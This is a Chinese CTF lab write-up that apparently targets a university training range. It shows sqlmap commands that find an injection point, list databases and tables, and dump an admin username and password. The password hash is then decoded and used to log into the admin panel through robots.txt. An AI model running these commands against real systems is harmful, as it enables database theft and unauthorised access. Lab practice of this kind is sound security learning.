SQL注入学习-RDCTF靶机实战1

sqlmap的使用

Ps:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。

本次使用的命令

sqlmap.py -u {
     URL} //查看是否有注入点
sqlmap.py -u {
     URL} -dbs //爆数据库
sqlmap.py -u {
     URL} -D db --tables //爆数据表
sqlmap.py -u {
     URL} -D db -T table --columns  //爆字段
sqlmap.py -u {
     URL} -D db -T table -C column(s) --dump  //输出字段

实际操作

本次使用江西软件大学网络攻防靶场做练习SQL注入学习-RDCTF靶机实战1_第1张图片
开启环境寻找注入点
SQL注入学习-RDCTF靶机实战1_第2张图片
在浏览学校文章处找到了注入点,尝试开始使用sqlmap爆破
SQL注入学习-RDCTF靶机实战1_第3张图片

找到了注入点,开始爆数据库!
SQL注入学习-RDCTF靶机实战1_第4张图片

payload:
sqlmap.py -u http://117.167.XXX.XXX:28031/index/narticle.php?nid=3024 -dbs

选择rjxy数据库,开始爆表名!
SQL注入学习-RDCTF靶机实战1_第5张图片

payload:
sqlmap.py -u http://117.167.XXX.XXX:28031/index/narticle.php?nid=3024 -D rjxy --tables

选择manager表爆字段
SQL注入学习-RDCTF靶机实战1_第6张图片

payload:
sqlmap.py -u http://117.167.136.244:28031/index/narticle.php?nid=3024 -D rjxy -T manager --columns

查询管理员密码
SQL注入学习-RDCTF靶机实战1_第7张图片

payload:
sqlmap.py -u http://117.167.136.244:28031/index/narticle.php?nid=3024 -D rjxy -T manager -C username,password --dump

此时得到管理员admin账户的密码,Base64解密后进行MD5解密,得到密码SQL注入学习-RDCTF靶机实战1_第8张图片

访问robots.txt查询管理员后台
SQL注入学习-RDCTF靶机实战1_第9张图片
进入管理员后台界面
SQL注入学习-RDCTF靶机实战1_第10张图片
成功进入后台界面!SQL注入学习-RDCTF靶机实战1_第11张图片

你可能感兴趣的:(工具学习)